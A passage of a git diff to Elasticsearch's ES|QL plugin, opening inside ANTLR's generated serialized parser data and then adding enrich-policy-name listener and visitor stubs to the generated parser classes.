">\u0000\u0000\u017d\u017f\u0003D\"\u0000\u017e\u017c\u0001\u0000\u0000"+ + "\u0000\u017f\u0182\u0001\u0000\u0000\u0000\u0180\u017e\u0001\u0000\u0000"+ + "\u0000\u0180\u0181\u0001\u0000\u0000\u0000\u0181C\u0001\u0000\u0000\u0000"+ + "\u0182\u0180\u0001\u0000\u0000\u0000\u0183\u0185\u0003\u0084B\u0000\u0184"+ + "\u0186\u0007\u0002\u0000\u0000\u0185\u0184\u0001\u0000\u0000\u0000\u0185"+ + "\u0186\u0001\u0000\u0000\u0000\u0186\u0189\u0001\u0000\u0000\u0000\u0187"+ + "\u0188\u0005I\u0000\u0000\u0188\u018a\u0007\u0003\u0000\u0000\u0189\u0187"+ + "\u0001\u0000\u0000\u0000\u0189\u018a\u0001\u0000\u0000\u0000\u018aE\u0001"+ + "\u0000\u0000\u0000\u018b\u018c\u0005\u001d\u0000\u0000\u018c\u018d\u0003"+ + "4\u001a\u0000\u018dG\u0001\u0000\u0000\u0000\u018e\u018f\u0005\u001c\u0000"+ + "\u0000\u018f\u0190\u00034\u001a\u0000\u0190I\u0001\u0000\u0000\u0000\u0191"+ + "\u0192\u0005 \u0000\u0000\u0192\u0197\u0003L&\u0000\u0193\u0194\u0005"+ + ">\u0000\u0000\u0194\u0196\u0003L&\u0000\u0195\u0193\u0001\u0000\u0000"+ + "\u0000\u0196\u0199\u0001\u0000\u0000\u0000\u0197\u0195\u0001\u0000\u0000"+ + "\u0000\u0197\u0198\u0001\u0000\u0000\u0000\u0198K\u0001\u0000\u0000\u0000"+ + "\u0199\u0197\u0001\u0000\u0000\u0000\u019a\u019b\u00032\u0019\u0000\u019b"+ + "\u019c\u0005\u0084\u0000\u0000\u019c\u019d\u00032\u0019\u0000\u019d\u01a3"+ + "\u0001\u0000\u0000\u0000\u019e\u019f\u00032\u0019\u0000\u019f\u01a0\u0005"+ + ":\u0000\u0000\u01a0\u01a1\u00032\u0019\u0000\u01a1\u01a3\u0001\u0000\u0000"+ + "\u0000\u01a2\u019a\u0001\u0000\u0000\u0000\u01a2\u019e\u0001\u0000\u0000"+ + "\u0000\u01a3M\u0001\u0000\u0000\u0000\u01a4\u01a5\u0005\b\u0000\u0000"+ + "\u01a5\u01a6\u0003\u008eG\u0000\u01a6\u01a8\u0003\u00a2Q\u0000\u01a7\u01a9"+ + "\u0003T*\u0000\u01a8\u01a7\u0001\u0000\u0000\u0000\u01a8\u01a9\u0001\u0000"+ + 
"\u0000\u0000\u01a9O\u0001\u0000\u0000\u0000\u01aa\u01ab\u0005\n\u0000"+ + "\u0000\u01ab\u01ac\u0003\u008eG\u0000\u01ac\u01ad\u0003\u00a2Q\u0000\u01ad"+ + "Q\u0001\u0000\u0000\u0000\u01ae\u01af\u0005\u001b\u0000\u0000\u01af\u01b0"+ + "\u00030\u0018\u0000\u01b0S\u0001\u0000\u0000\u0000\u01b1\u01b6\u0003V"+ + "+\u0000\u01b2\u01b3\u0005>\u0000\u0000\u01b3\u01b5\u0003V+\u0000\u01b4"+ + "\u01b2\u0001\u0000\u0000\u0000\u01b5\u01b8\u0001\u0000\u0000\u0000\u01b6"+ + "\u01b4\u0001\u0000\u0000\u0000\u01b6\u01b7\u0001\u0000\u0000\u0000\u01b7"+ + "U\u0001\u0000\u0000\u0000\u01b8\u01b6\u0001\u0000\u0000\u0000\u01b9\u01ba"+ + "\u00036\u001b\u0000\u01ba\u01bb\u0005:\u0000\u0000\u01bb\u01bc\u0003\u0098"+ + "L\u0000\u01bcW\u0001\u0000\u0000\u0000\u01bd\u01be\u0005\u0006\u0000\u0000"+ + "\u01be\u01bf\u0003Z-\u0000\u01bfY\u0001\u0000\u0000\u0000\u01c0\u01c1"+ + "\u0005c\u0000\u0000\u01c1\u01c2\u0003\u0002\u0001\u0000\u01c2\u01c3\u0005"+ + "d\u0000\u0000\u01c3[\u0001\u0000\u0000\u0000\u01c4\u01c5\u0005!\u0000"+ + "\u0000\u01c5\u01c6\u0005\u0088\u0000\u0000\u01c6]\u0001\u0000\u0000\u0000"+ + "\u01c7\u01c8\u0005\u0005\u0000\u0000\u01c8\u01cb\u0003`0\u0000\u01c9\u01ca"+ + "\u0005J\u0000\u0000\u01ca\u01cc\u00032\u0019\u0000\u01cb\u01c9\u0001\u0000"+ + "\u0000\u0000\u01cb\u01cc\u0001\u0000\u0000\u0000\u01cc\u01d6\u0001\u0000"+ + "\u0000\u0000\u01cd\u01ce\u0005O\u0000\u0000\u01ce\u01d3\u0003b1\u0000"+ + "\u01cf\u01d0\u0005>\u0000\u0000\u01d0\u01d2\u0003b1\u0000\u01d1\u01cf"+ + "\u0001\u0000\u0000\u0000\u01d2\u01d5\u0001\u0000\u0000\u0000\u01d3\u01d1"+ + "\u0001\u0000\u0000\u0000\u01d3\u01d4\u0001\u0000\u0000\u0000\u01d4\u01d7"+ + "\u0001\u0000\u0000\u0000\u01d5\u01d3\u0001\u0000\u0000\u0000\u01d6\u01cd"+ + "\u0001\u0000\u0000\u0000\u01d6\u01d7\u0001\u0000\u0000\u0000\u01d7_\u0001"+ + "\u0000\u0000\u0000\u01d8\u01d9\u0007\u0004\u0000\u0000\u01d9a\u0001\u0000"+ + "\u0000\u0000\u01da\u01db\u00032\u0019\u0000\u01db\u01dc\u0005:\u0000\u0000"+ + "\u01dc\u01de\u0001\u0000\u0000\u0000\u01dd\u01da\u0001\u0000\u0000\u0000"+ + "\u01dd\u01de\u0001\u0000\u0000\u0000\u01de\u01df\u0001\u0000\u0000\u0000"+ + "\u01df\u01e0\u00032\u0019\u0000\u01e0c\u0001\u0000\u0000\u0000\u01e1\u01e2"+ + "\u0005\r\u0000\u0000\u01e2\u01e3\u0003\u0098L\u0000\u01e3e\u0001\u0000"+ + "\u0000\u0000\u01e4\u01e5\u0005\u001a\u0000\u0000\u01e5\u01e6\u0003\u001c"+ + "\u000e\u0000\u01e6\u01e7\u0005J\u0000\u0000\u01e7\u01e8\u00034\u001a\u0000"+ + "\u01e8g\u0001\u0000\u0000\u0000\u01e9\u01ea\u0005\u0011\u0000\u0000\u01ea"+ + "\u01ed\u0003,\u0016\u0000\u01eb\u01ec\u0005;\u0000\u0000\u01ec\u01ee\u0003"+ + "\u000e\u0007\u0000\u01ed\u01eb\u0001\u0000\u0000\u0000\u01ed\u01ee\u0001"+ + "\u0000\u0000\u0000\u01eei\u0001\u0000\u0000\u0000\u01ef\u01f0\u0005\u0004"+ + "\u0000\u0000\u01f0\u01f3\u00030\u0018\u0000\u01f1\u01f2\u0005J\u0000\u0000"+ + "\u01f2\u01f4\u00030\u0018\u0000\u01f3\u01f1\u0001\u0000\u0000\u0000\u01f3"+ + "\u01f4\u0001\u0000\u0000\u0000\u01f4\u01fa\u0001\u0000\u0000\u0000\u01f5"+ + "\u01f6\u0005\u0084\u0000\u0000\u01f6\u01f7\u00030\u0018\u0000\u01f7\u01f8"+ + "\u0005>\u0000\u0000\u01f8\u01f9\u00030\u0018\u0000\u01f9\u01fb\u0001\u0000"+ + "\u0000\u0000\u01fa\u01f5\u0001\u0000\u0000\u0000\u01fa\u01fb\u0001\u0000"+ + "\u0000\u0000\u01fbk\u0001\u0000\u0000\u0000\u01fc\u01fd\u0005\u001e\u0000"+ + "\u0000\u01fd\u01fe\u00034\u001a\u0000\u01fem\u0001\u0000\u0000\u0000\u01ff"+ + "\u0200\u0005\u0015\u0000\u0000\u0200\u0201\u0003p8\u0000\u0201o\u0001"+ + "\u0000\u0000\u0000\u0202\u0204\u0003r9\u0000\u0203\u0202\u0001\u0000\u0000"+ + 
"\u0000\u0204\u0205\u0001\u0000\u0000\u0000\u0205\u0203\u0001\u0000\u0000"+ + "\u0000\u0205\u0206\u0001\u0000\u0000\u0000\u0206q\u0001\u0000\u0000\u0000"+ + "\u0207\u0208\u0005c\u0000\u0000\u0208\u0209\u0003t:\u0000\u0209\u020a"+ + "\u0005d\u0000\u0000\u020as\u0001\u0000\u0000\u0000\u020b\u020c\u0006:"+ + "\uffff\uffff\u0000\u020c\u020d\u0003v;\u0000\u020d\u0213\u0001\u0000\u0000"+ + "\u0000\u020e\u020f\n\u0001\u0000\u0000\u020f\u0210\u00054\u0000\u0000"+ + "\u0210\u0212\u0003v;\u0000\u0211\u020e\u0001\u0000\u0000\u0000\u0212\u0215"+ + "\u0001\u0000\u0000\u0000\u0213\u0211\u0001\u0000\u0000\u0000\u0213\u0214"+ + "\u0001\u0000\u0000\u0000\u0214u\u0001\u0000\u0000\u0000\u0215\u0213\u0001"+ + "\u0000\u0000\u0000\u0216\u0217\u0003\u0006\u0003\u0000\u0217w\u0001\u0000"+ + "\u0000\u0000\u0218\u0219\u0005\u001f\u0000\u0000\u0219y\u0001\u0000\u0000"+ + "\u0000\u021a\u021f\u0003|>\u0000\u021b\u021c\u0005>\u0000\u0000\u021c"+ + "\u021e\u0003|>\u0000\u021d\u021b\u0001\u0000\u0000\u0000\u021e\u0221\u0001"+ + "\u0000\u0000\u0000\u021f\u021d\u0001\u0000\u0000\u0000\u021f\u0220\u0001"+ + "\u0000\u0000\u0000\u0220{\u0001\u0000\u0000\u0000\u0221\u021f\u0001\u0000"+ + "\u0000\u0000\u0222\u0223\u00036\u001b\u0000\u0223\u0224\u0005:\u0000\u0000"+ + "\u0224\u0225\u0003~?\u0000\u0225}\u0001\u0000\u0000\u0000\u0226\u0229"+ + "\u0003\u0098L\u0000\u0227\u0229\u00036\u001b\u0000\u0228\u0226\u0001\u0000"+ + "\u0000\u0000\u0228\u0227\u0001\u0000\u0000\u0000\u0229\u007f\u0001\u0000"+ + "\u0000\u0000\u022a\u022b\u0005\u0012\u0000\u0000\u022b\u022c\u0003\u0098"+ + "L\u0000\u022c\u022d\u0005J\u0000\u0000\u022d\u0230\u0003\u0012\t\u0000"+ + "\u022e\u022f\u0005O\u0000\u0000\u022f\u0231\u0003z=\u0000\u0230\u022e"+ + "\u0001\u0000\u0000\u0000\u0230\u0231\u0001\u0000\u0000\u0000\u0231\u0081"+ + "\u0001\u0000\u0000\u0000\u0232\u0236\u0005\u0007\u0000\u0000\u0233\u0234"+ + "\u00030\u0018\u0000\u0234\u0235\u0005:\u0000\u0000\u0235\u0237\u0001\u0000"+ + "\u0000\u0000\u0236\u0233\u0001\u0000\u0000\u0000\u0236\u0237\u0001\u0000"+ + "\u0000\u0000\u0237\u0238\u0001\u0000\u0000\u0000\u0238\u0239\u0003\u008e"+ + "G\u0000\u0239\u023a\u0005O\u0000\u0000\u023a\u023b\u0003>\u001f\u0000"+ + "\u023b\u0083\u0001\u0000\u0000\u0000\u023c\u023d\u0006B\uffff\uffff\u0000"+ + "\u023d\u023e\u0005G\u0000\u0000\u023e\u025a\u0003\u0084B\b\u023f\u025a"+ + "\u0003\u008aE\u0000\u0240\u025a\u0003\u0086C\u0000\u0241\u0243\u0003\u008a"+ + "E\u0000\u0242\u0244\u0005G\u0000\u0000\u0243\u0242\u0001\u0000\u0000\u0000"+ + "\u0243\u0244\u0001\u0000\u0000\u0000\u0244\u0245\u0001\u0000\u0000\u0000"+ + "\u0245\u0246\u0005C\u0000\u0000\u0246\u0247\u0005c\u0000\u0000\u0247\u024c"+ + "\u0003\u008aE\u0000\u0248\u0249\u0005>\u0000\u0000\u0249\u024b\u0003\u008a"+ + "E\u0000\u024a\u0248\u0001\u0000\u0000\u0000\u024b\u024e\u0001\u0000\u0000"+ + "\u0000\u024c\u024a\u0001\u0000\u0000\u0000\u024c\u024d\u0001\u0000\u0000"+ + "\u0000\u024d\u024f\u0001\u0000\u0000\u0000\u024e\u024c\u0001\u0000\u0000"+ + "\u0000\u024f\u0250\u0005d\u0000\u0000\u0250\u025a\u0001\u0000\u0000\u0000"+ + "\u0251\u0252\u0003\u008aE\u0000\u0252\u0254\u0005D\u0000\u0000\u0253\u0255"+ + "\u0005G\u0000\u0000\u0254\u0253\u0001\u0000\u0000\u0000\u0254\u0255\u0001"+ + "\u0000\u0000\u0000\u0255\u0256\u0001\u0000\u0000\u0000\u0256\u0257\u0005"+ + "H\u0000\u0000\u0257\u025a\u0001\u0000\u0000\u0000\u0258\u025a\u0003\u0088"+ + "D\u0000\u0259\u023c\u0001\u0000\u0000\u0000\u0259\u023f\u0001\u0000\u0000"+ + "\u0000\u0259\u0240\u0001\u0000\u0000\u0000\u0259\u0241\u0001\u0000\u0000"+ + 
"\u0000\u0259\u0251\u0001\u0000\u0000\u0000\u0259\u0258\u0001\u0000\u0000"+ + "\u0000\u025a\u0263\u0001\u0000\u0000\u0000\u025b\u025c\n\u0005\u0000\u0000"+ + "\u025c\u025d\u00058\u0000\u0000\u025d\u0262\u0003\u0084B\u0006\u025e\u025f"+ + "\n\u0004\u0000\u0000\u025f\u0260\u0005K\u0000\u0000\u0260\u0262\u0003"+ + "\u0084B\u0005\u0261\u025b\u0001\u0000\u0000\u0000\u0261\u025e\u0001\u0000"+ + "\u0000\u0000\u0262\u0265\u0001\u0000\u0000\u0000\u0263\u0261\u0001\u0000"+ + "\u0000\u0000\u0263\u0264\u0001\u0000\u0000\u0000\u0264\u0085\u0001\u0000"+ + "\u0000\u0000\u0265\u0263\u0001\u0000\u0000\u0000\u0266\u0268\u0003\u008a"+ + "E\u0000\u0267\u0269\u0005G\u0000\u0000\u0268\u0267\u0001\u0000\u0000\u0000"+ + "\u0268\u0269\u0001\u0000\u0000\u0000\u0269\u026a\u0001\u0000\u0000\u0000"+ + "\u026a\u026b\u0005F\u0000\u0000\u026b\u026c\u0003\u00a2Q\u0000\u026c\u0285"+ + "\u0001\u0000\u0000\u0000\u026d\u026f\u0003\u008aE\u0000\u026e\u0270\u0005"+ + "G\u0000\u0000\u026f\u026e\u0001\u0000\u0000\u0000\u026f\u0270\u0001\u0000"+ + "\u0000\u0000\u0270\u0271\u0001\u0000\u0000\u0000\u0271\u0272\u0005M\u0000"+ + "\u0000\u0272\u0273\u0003\u00a2Q\u0000\u0273\u0285\u0001\u0000\u0000\u0000"+ + "\u0274\u0276\u0003\u008aE\u0000\u0275\u0277\u0005G\u0000\u0000\u0276\u0275"+ + "\u0001\u0000\u0000\u0000\u0276\u0277\u0001\u0000\u0000\u0000\u0277\u0278"+ + "\u0001\u0000\u0000\u0000\u0278\u0279\u0005F\u0000\u0000\u0279\u027a\u0005"+ + "c\u0000\u0000\u027a\u027f\u0003\u00a2Q\u0000\u027b\u027c\u0005>\u0000"+ + "\u0000\u027c\u027e\u0003\u00a2Q\u0000\u027d\u027b\u0001\u0000\u0000\u0000"+ + "\u027e\u0281\u0001\u0000\u0000\u0000\u027f\u027d\u0001\u0000\u0000\u0000"+ + "\u027f\u0280\u0001\u0000\u0000\u0000\u0280\u0282\u0001\u0000\u0000\u0000"+ + "\u0281\u027f\u0001\u0000\u0000\u0000\u0282\u0283\u0005d\u0000\u0000\u0283"+ + "\u0285\u0001\u0000\u0000\u0000\u0284\u0266\u0001\u0000\u0000\u0000\u0284"+ + "\u026d\u0001\u0000\u0000\u0000\u0284\u0274\u0001\u0000\u0000\u0000\u0285"+ + "\u0087\u0001\u0000\u0000\u0000\u0286\u0289\u00030\u0018\u0000\u0287\u0288"+ + "\u0005<\u0000\u0000\u0288\u028a\u0003\n\u0005\u0000\u0289\u0287\u0001"+ + "\u0000\u0000\u0000\u0289\u028a\u0001\u0000\u0000\u0000\u028a\u028b\u0001"+ + "\u0000\u0000\u0000\u028b\u028c\u0005=\u0000\u0000\u028c\u028d\u0003\u0098"+ + "L\u0000\u028d\u0089\u0001\u0000\u0000\u0000\u028e\u0294\u0003\u008cF\u0000"+ + "\u028f\u0290\u0003\u008cF\u0000\u0290\u0291\u0003\u00a4R\u0000\u0291\u0292"+ + "\u0003\u008cF\u0000\u0292\u0294\u0001\u0000\u0000\u0000\u0293\u028e\u0001"+ + "\u0000\u0000\u0000\u0293\u028f\u0001\u0000\u0000\u0000\u0294\u008b\u0001"+ + "\u0000\u0000\u0000\u0295\u0296\u0006F\uffff\uffff\u0000\u0296\u029a\u0003"+ + "\u008eG\u0000\u0297\u0298\u0007\u0005\u0000\u0000\u0298\u029a\u0003\u008c"+ + "F\u0003\u0299\u0295\u0001\u0000\u0000\u0000\u0299\u0297\u0001\u0000\u0000"+ + "\u0000\u029a\u02a3\u0001\u0000\u0000\u0000\u029b\u029c\n\u0002\u0000\u0000"+ + "\u029c\u029d\u0007\u0006\u0000\u0000\u029d\u02a2\u0003\u008cF\u0003\u029e"+ + "\u029f\n\u0001\u0000\u0000\u029f\u02a0\u0007\u0005\u0000\u0000\u02a0\u02a2"+ + "\u0003\u008cF\u0002\u02a1\u029b\u0001\u0000\u0000\u0000\u02a1\u029e\u0001"+ + "\u0000\u0000\u0000\u02a2\u02a5\u0001\u0000\u0000\u0000\u02a3\u02a1\u0001"+ + "\u0000\u0000\u0000\u02a3\u02a4\u0001\u0000\u0000\u0000\u02a4\u008d\u0001"+ + "\u0000\u0000\u0000\u02a5\u02a3\u0001\u0000\u0000\u0000\u02a6\u02a7\u0006"+ + "G\uffff\uffff\u0000\u02a7\u02af\u0003\u0098L\u0000\u02a8\u02af\u00030"+ + "\u0018\u0000\u02a9\u02af\u0003\u0090H\u0000\u02aa\u02ab\u0005c\u0000\u0000"+ + 
"\u02ab\u02ac\u0003\u0084B\u0000\u02ac\u02ad\u0005d\u0000\u0000\u02ad\u02af"+ + "\u0001\u0000\u0000\u0000\u02ae\u02a6\u0001\u0000\u0000\u0000\u02ae\u02a8"+ + "\u0001\u0000\u0000\u0000\u02ae\u02a9\u0001\u0000\u0000\u0000\u02ae\u02aa"+ + "\u0001\u0000\u0000\u0000\u02af\u02b5\u0001\u0000\u0000\u0000\u02b0\u02b1"+ + "\n\u0001\u0000\u0000\u02b1\u02b2\u0005<\u0000\u0000\u02b2\u02b4\u0003"+ + "\n\u0005\u0000\u02b3\u02b0\u0001\u0000\u0000\u0000\u02b4\u02b7\u0001\u0000"+ + "\u0000\u0000\u02b5\u02b3\u0001\u0000\u0000\u0000\u02b5\u02b6\u0001\u0000"+ + "\u0000\u0000\u02b6\u008f\u0001\u0000\u0000\u0000\u02b7\u02b5\u0001\u0000"+ + "\u0000\u0000\u02b8\u02b9\u0003\u0092I\u0000\u02b9\u02c7\u0005c\u0000\u0000"+ + "\u02ba\u02c8\u0005Y\u0000\u0000\u02bb\u02c0\u0003\u0084B\u0000\u02bc\u02bd"+ + "\u0005>\u0000\u0000\u02bd\u02bf\u0003\u0084B\u0000\u02be\u02bc\u0001\u0000"+ + "\u0000\u0000\u02bf\u02c2\u0001\u0000\u0000\u0000\u02c0\u02be\u0001\u0000"+ + "\u0000\u0000\u02c0\u02c1\u0001\u0000\u0000\u0000\u02c1\u02c5\u0001\u0000"+ + "\u0000\u0000\u02c2\u02c0\u0001\u0000\u0000\u0000\u02c3\u02c4\u0005>\u0000"+ + "\u0000\u02c4\u02c6\u0003\u0094J\u0000\u02c5\u02c3\u0001\u0000\u0000\u0000"+ + "\u02c5\u02c6\u0001\u0000\u0000\u0000\u02c6\u02c8\u0001\u0000\u0000\u0000"+ + "\u02c7\u02ba\u0001\u0000\u0000\u0000\u02c7\u02bb\u0001\u0000\u0000\u0000"+ + "\u02c7\u02c8\u0001\u0000\u0000\u0000\u02c8\u02c9\u0001\u0000\u0000\u0000"+ + "\u02c9\u02ca\u0005d\u0000\u0000\u02ca\u0091\u0001\u0000\u0000\u0000\u02cb"+ + "\u02cc\u0003>\u001f\u0000\u02cc\u0093\u0001\u0000\u0000\u0000\u02cd\u02ce"+ + "\u0005\\\u0000\u0000\u02ce\u02d3\u0003\u0096K\u0000\u02cf\u02d0\u0005"+ + ">\u0000\u0000\u02d0\u02d2\u0003\u0096K\u0000\u02d1\u02cf\u0001\u0000\u0000"+ + "\u0000\u02d2\u02d5\u0001\u0000\u0000\u0000\u02d3\u02d1\u0001\u0000\u0000"+ + "\u0000\u02d3\u02d4\u0001\u0000\u0000\u0000\u02d4\u02d6\u0001\u0000\u0000"+ + "\u0000\u02d5\u02d3\u0001\u0000\u0000\u0000\u02d6\u02d7\u0005]\u0000\u0000"+ + "\u02d7\u0095\u0001\u0000\u0000\u0000\u02d8\u02d9\u0003\u00a2Q\u0000\u02d9"+ + "\u02da\u0005=\u0000\u0000\u02da\u02db\u0003\u0098L\u0000\u02db\u0097\u0001"+ + "\u0000\u0000\u0000\u02dc\u0307\u0005H\u0000\u0000\u02dd\u02de\u0003\u00a0"+ + "P\u0000\u02de\u02df\u0005e\u0000\u0000\u02df\u0307\u0001\u0000\u0000\u0000"+ + "\u02e0\u0307\u0003\u009eO\u0000\u02e1\u0307\u0003\u00a0P\u0000\u02e2\u0307"+ + "\u0003\u009aM\u0000\u02e3\u0307\u0003:\u001d\u0000\u02e4\u0307\u0003\u00a2"+ + "Q\u0000\u02e5\u02e6\u0005a\u0000\u0000\u02e6\u02eb\u0003\u009cN\u0000"+ + "\u02e7\u02e8\u0005>\u0000\u0000\u02e8\u02ea\u0003\u009cN\u0000\u02e9\u02e7"+ + "\u0001\u0000\u0000\u0000\u02ea\u02ed\u0001\u0000\u0000\u0000\u02eb\u02e9"+ + "\u0001\u0000\u0000\u0000\u02eb\u02ec\u0001\u0000\u0000\u0000\u02ec\u02ee"+ + "\u0001\u0000\u0000\u0000\u02ed\u02eb\u0001\u0000\u0000\u0000\u02ee\u02ef"+ + "\u0005b\u0000\u0000\u02ef\u0307\u0001\u0000\u0000\u0000\u02f0\u02f1\u0005"+ + "a\u0000\u0000\u02f1\u02f6\u0003\u009aM\u0000\u02f2\u02f3\u0005>\u0000"+ + "\u0000\u02f3\u02f5\u0003\u009aM\u0000\u02f4\u02f2\u0001\u0000\u0000\u0000"+ + "\u02f5\u02f8\u0001\u0000\u0000\u0000\u02f6\u02f4\u0001\u0000\u0000\u0000"+ + "\u02f6\u02f7\u0001\u0000\u0000\u0000\u02f7\u02f9\u0001\u0000\u0000\u0000"+ + "\u02f8\u02f6\u0001\u0000\u0000\u0000\u02f9\u02fa\u0005b\u0000\u0000\u02fa"+ + "\u0307\u0001\u0000\u0000\u0000\u02fb\u02fc\u0005a\u0000\u0000\u02fc\u0301"+ + "\u0003\u00a2Q\u0000\u02fd\u02fe\u0005>\u0000\u0000\u02fe\u0300\u0003\u00a2"+ + "Q\u0000\u02ff\u02fd\u0001\u0000\u0000\u0000\u0300\u0303\u0001\u0000\u0000"+ + 
"\u0000\u0301\u02ff\u0001\u0000\u0000\u0000\u0301\u0302\u0001\u0000\u0000"+ + "\u0000\u0302\u0304\u0001\u0000\u0000\u0000\u0303\u0301\u0001\u0000\u0000"+ + "\u0000\u0304\u0305\u0005b\u0000\u0000\u0305\u0307\u0001\u0000\u0000\u0000"+ + "\u0306\u02dc\u0001\u0000\u0000\u0000\u0306\u02dd\u0001\u0000\u0000\u0000"+ + "\u0306\u02e0\u0001\u0000\u0000\u0000\u0306\u02e1\u0001\u0000\u0000\u0000"+ + "\u0306\u02e2\u0001\u0000\u0000\u0000\u0306\u02e3\u0001\u0000\u0000\u0000"+ + "\u0306\u02e4\u0001\u0000\u0000\u0000\u0306\u02e5\u0001\u0000\u0000\u0000"+ + "\u0306\u02f0\u0001\u0000\u0000\u0000\u0306\u02fb\u0001\u0000\u0000\u0000"+ + "\u0307\u0099\u0001\u0000\u0000\u0000\u0308\u0309\u0007\u0007\u0000\u0000"+ + "\u0309\u009b\u0001\u0000\u0000\u0000\u030a\u030d\u0003\u009eO\u0000\u030b"+ + "\u030d\u0003\u00a0P\u0000\u030c\u030a\u0001\u0000\u0000\u0000\u030c\u030b"+ + "\u0001\u0000\u0000\u0000\u030d\u009d\u0001\u0000\u0000\u0000\u030e\u0310"+ + "\u0007\u0005\u0000\u0000\u030f\u030e\u0001\u0000\u0000\u0000\u030f\u0310"+ + "\u0001\u0000\u0000\u0000\u0310\u0311\u0001\u0000\u0000\u0000\u0311\u0312"+ + "\u00057\u0000\u0000\u0312\u009f\u0001\u0000\u0000\u0000\u0313\u0315\u0007"+ + "\u0005\u0000\u0000\u0314\u0313\u0001\u0000\u0000\u0000\u0314\u0315\u0001"+ + "\u0000\u0000\u0000\u0315\u0316\u0001\u0000\u0000\u0000\u0316\u0317\u0005"+ + "6\u0000\u0000\u0317\u00a1\u0001\u0000\u0000\u0000\u0318\u0319\u00055\u0000"+ + "\u0000\u0319\u00a3\u0001\u0000\u0000\u0000\u031a\u031b\u0007\b\u0000\u0000"+ + "\u031b\u00a5\u0001\u0000\u0000\u0000\u031c\u031d\u0007\t\u0000\u0000\u031d"+ + "\u031e\u0005r\u0000\u0000\u031e\u031f\u0003\u00a8T\u0000\u031f\u0320\u0003"+ + "\u00aaU\u0000\u0320\u00a7\u0001\u0000\u0000\u0000\u0321\u0322\u0003\u001c"+ + "\u000e\u0000\u0322\u00a9\u0001\u0000\u0000\u0000\u0323\u0324\u0005J\u0000"+ + "\u0000\u0324\u0329\u0003\u00acV\u0000\u0325\u0326\u0005>\u0000\u0000\u0326"+ + "\u0328\u0003\u00acV\u0000\u0327\u0325\u0001\u0000\u0000\u0000\u0328\u032b"+ + "\u0001\u0000\u0000\u0000\u0329\u0327\u0001\u0000\u0000\u0000\u0329\u032a"+ + "\u0001\u0000\u0000\u0000\u032a\u00ab\u0001\u0000\u0000\u0000\u032b\u0329"+ + "\u0001\u0000\u0000\u0000\u032c\u032d\u0003\u008aE\u0000\u032d\u00ad\u0001"+ + "\u0000\u0000\u0000H\u00b9\u00c3\u00e0\u00ef\u00f5\u00fe\u0104\u0111\u0115"+ + "\u0120\u0130\u0138\u013c\u0143\u0149\u0150\u0158\u0160\u0168\u016c\u0170"+ + "\u0175\u0180\u0185\u0189\u0197\u01a2\u01a8\u01b6\u01cb\u01d3\u01d6\u01dd"+ + "\u01ed\u01f3\u01fa\u0205\u0213\u021f\u0228\u0230\u0236\u0243\u024c\u0254"+ + "\u0259\u0261\u0263\u0268\u026f\u0276\u027f\u0284\u0289\u0293\u0299\u02a1"+ + "\u02a3\u02ae\u02b5\u02c0\u02c5\u02c7\u02d3\u02eb\u02f6\u0301\u0306\u030c"+ + "\u030f\u0314\u0329"; public static final ATN _ATN = new ATNDeserializer().deserialize(_serializedATN.toCharArray()); static { diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseListener.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseListener.java index 8a9bc07a99eae..24e5e37c33732 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseListener.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseListener.java @@ -632,6 +632,18 @@ public class EsqlBaseParserBaseListener implements EsqlBaseParserListener { *
<p>The default implementation does nothing.</p>
*/ @Override public void exitEnrichCommand(EsqlBaseParser.EnrichCommandContext ctx) { } + /** + * {@inheritDoc} + * + *
<p>The default implementation does nothing.</p>
+ */ + @Override public void enterEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx) { } + /** + * {@inheritDoc} + * + *
<p>The default implementation does nothing.</p>
*/ + @Override public void exitEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx) { } /** * {@inheritDoc} * diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseVisitor.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseVisitor.java index 6c13edd55907a..591e126025943 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseVisitor.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserBaseVisitor.java @@ -377,6 +377,13 @@ public class EsqlBaseParserBaseVisitor<T> extends AbstractParseTreeVisitor<T> im * {@link #visitChildren} on {@code ctx}.</p>
*/ @Override public T visitEnrichCommand(EsqlBaseParser.EnrichCommandContext ctx) { return visitChildren(ctx); } + /** + * {@inheritDoc} + * + *
<p>The default implementation returns the result of calling + * {@link #visitChildren} on {@code ctx}.</p>
+ */ + @Override public T visitEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx) { return visitChildren(ctx); } /** * {@inheritDoc} * diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserListener.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserListener.java index cfab02cb3d826..9f088be7bcfd4 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserListener.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserListener.java @@ -541,6 +541,16 @@ public interface EsqlBaseParserListener extends ParseTreeListener { * @param ctx the parse tree */ void exitEnrichCommand(EsqlBaseParser.EnrichCommandContext ctx); + /** + * Enter a parse tree produced by {@link EsqlBaseParser#enrichPolicyName}. + * @param ctx the parse tree + */ + void enterEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx); + /** + * Exit a parse tree produced by {@link EsqlBaseParser#enrichPolicyName}. + * @param ctx the parse tree + */ + void exitEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx); /** * Enter a parse tree produced by {@link EsqlBaseParser#enrichWithClause}. * @param ctx the parse tree diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserVisitor.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserVisitor.java index b27d3f0210cdb..cc0245d04bf82 100644 --- 